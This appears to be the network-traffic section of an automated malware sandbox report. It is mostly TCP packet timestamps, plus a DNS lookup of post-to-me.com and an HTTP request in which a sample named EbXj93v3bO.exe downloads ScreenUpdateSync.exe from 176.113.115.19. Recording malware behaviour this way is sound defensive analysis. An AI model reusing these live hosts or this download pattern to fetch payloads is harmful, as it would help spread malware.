Dec 11, 2024 00:02:04.215141058 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.216692924 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.216746092 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.216815948 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.216865063 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.218509912 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.218563080 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.218585014 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.218599081 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.220320940 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.220376015 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.220436096 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.220480919 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.222157001 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.222207069 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.222357035 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.222400904 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.223978996 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.224024057 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.224077940 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.224123001 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.225783110 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.225832939 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.225985050 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.226031065 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.227641106 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.227691889 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.227869034 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.227921963 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.229468107 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.229533911 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.229572058 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.229636908 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.231266975 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.231317043 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.231332064 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.231369972 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.233072996 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.233123064 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.233186960 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.233237028 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.234915972 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.234966993 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.234971046 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.235008001 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.236718893 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.236763954 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.236788988 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.236839056 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.238537073 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.238590002 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.238634109 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.238681078 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.240361929 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.240422964 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.240480900 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.240530014 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.242183924 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.242228985 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.242296934 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.242345095 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.244015932 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.244066000 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.244127035 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.244198084 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.245834112 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.245897055 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.245927095 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.245974064 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.247672081 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.247721910 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.247786045 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.247836113 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.249473095 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.249525070 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.249593019 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.249656916 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.251321077 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.251374960 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.251410007 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.251456022 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.253160954 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.253216982 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.253298998 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.253346920 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.254954100 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.255009890 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.255044937 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.255101919 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.256757975 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.256813049 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.256911993 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.256963968 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.258615017 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.258666039 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.258667946 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.258706093 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.260409117 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.260461092 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.260510921 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.260561943 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.262228012 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.262279987 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.262315989 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.262362957 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.349025011 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.349112988 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.349222898 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.349276066 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.350035906 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.350090027 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.350122929 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.350181103 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.351758003 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.351808071 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.351875067 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.351917982 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.378588915 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.378647089 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.378678083 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.378719091 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.379466057 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.379530907 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.379611969 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.380790949 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.380846977 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.380932093 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.380980015 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.382586956 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.382637024 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.382776976 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.382818937 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.384358883 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.384406090 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.384408951 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.384445906 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.386146069 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.386199951 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.386240005 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.386300087 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.387914896 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.387979984 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.388011932 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.388066053 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.389669895 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.389718056 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.389883041 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.389931917 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.391453028 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.391503096 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.391601086 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.391645908 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.393234015 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.393280983 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.393323898 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.393368006 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.395009995 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.395056009 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.395136118 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.395180941 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.396802902 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.396848917 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.396883011 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.396943092 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.398576975 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.398610115 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.398638964 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.398650885 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.400352001 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.400402069 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.400466919 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.400516987 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.401954889 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.402005911 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.402061939 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.402107000 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.403538942 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.403584003 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.403621912 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.403666019 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.405123949 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.405169964 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.405236006 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.405287027 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.406722069 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.406773090 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.406944990 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.406991959 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.408323050 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.408370972 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.408518076 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.408559084 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.409904957 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.409967899 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.410027027 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.410087109 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.411487103 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.411533117 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.411547899 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.411590099 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.413110018 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.413161993 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.413201094 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.413247108 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.414705038 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.414750099 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.414845943 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.414897919 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.416317940 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.416366100 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.416404963 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.416444063 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.417870045 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.417917967 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.417979002 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.418025970 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.419464111 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.419524908 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.419560909 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.419606924 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.421063900 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.421111107 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.421256065 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.421300888 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.422679901 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.422728062 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.422910929 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.422970057 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.424330950 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.424371004 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.424377918 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.424418926 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.425932884 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.425977945 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.426137924 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.426184893 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.427484989 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.427532911 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.427606106 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.427650928 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.429047108 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.429091930 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.429168940 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.429219007 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.430641890 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.430707932 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.430737972 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.430783033 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.432225943 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.432275057 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.432329893 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.432370901 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.433835030 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.433885098 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.433955908 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.433998108 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.435437918 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.435482979 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.435563087 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.435609102 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.437036991 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.437083006 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.437150955 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.437199116 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.438641071 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.438688993 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.438810110 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.438857079 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.440215111 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.440264940 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.440301895 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.440345049 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.441842079 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.441909075 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.441935062 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.441981077 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.443417072 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.443463087 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.443517923 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.443562984 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.445008039 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.445055008 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.445110083 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.445171118 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.446614981 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.446665049 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.446702957 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.446748018 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.541177988 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.541256905 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:04.541290045 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:04.541342974 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:06.978956938 CET	49738	80	192.168.2.4	92.255.57.89
Dec 11, 2024 00:02:07.098313093 CET	80	49738	92.255.57.89	192.168.2.4
Dec 11, 2024 00:02:07.098516941 CET	49738	80	192.168.2.4	92.255.57.89
Dec 11, 2024 00:02:07.099173069 CET	49738	80	192.168.2.4	92.255.57.89
Dec 11, 2024 00:02:07.218359947 CET	80	49738	92.255.57.89	192.168.2.4
Dec 11, 2024 00:02:08.421931028 CET	80	49738	92.255.57.89	192.168.2.4
Dec 11, 2024 00:02:08.421987057 CET	49738	80	192.168.2.4	92.255.57.89
Dec 11, 2024 00:02:08.425407887 CET	49738	80	192.168.2.4	92.255.57.89
Dec 11, 2024 00:02:08.544675112 CET	80	49738	92.255.57.89	192.168.2.4
Dec 11, 2024 00:02:08.852916002 CET	80	49737	176.113.115.19	192.168.2.4
Dec 11, 2024 00:02:08.852974892 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:02:08.868931055 CET	80	49738	92.255.57.89	192.168.2.4
Dec 11, 2024 00:02:08.868985891 CET	49738	80	192.168.2.4	92.255.57.89
Dec 11, 2024 00:02:13.874113083 CET	80	49738	92.255.57.89	192.168.2.4
Dec 11, 2024 00:02:13.875435114 CET	49738	80	192.168.2.4	92.255.57.89
Dec 11, 2024 00:02:39.892880917 CET	49738	80	192.168.2.4	92.255.57.89
Dec 11, 2024 00:03:49.815713882 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:03:50.127731085 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:03:50.735755920 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:03:51.939677954 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:03:54.345649958 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:03:59.157150984 CET	49737	80	192.168.2.4	176.113.115.19
Dec 11, 2024 00:04:08.769716978 CET	49737	80	192.168.2.4	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 00:01:59.858968973 CET	65382	53	192.168.2.4	1.1.1.1
Dec 11, 2024 00:02:00.083458900 CET	53	65382	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 11, 2024 00:01:59.858968973 CET	192.168.2.4	1.1.1.1	0x3480	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 11, 2024 00:02:00.083458900 CET	1.1.1.1	192.168.2.4	0x3480	No error (0)	post-to-me.com		172.67.179.207	A (IP address)	IN (0x0001)	false
Dec 11, 2024 00:02:00.083458900 CET	1.1.1.1	192.168.2.4	0x3480	No error (0)	post-to-me.com		104.21.56.70	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

176.113.115.19

92.255.57.89

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	176.113.115.19	80	7784	C:\Users\user\Desktop\EbXj93v3bO.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 00:02:02.248752117 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
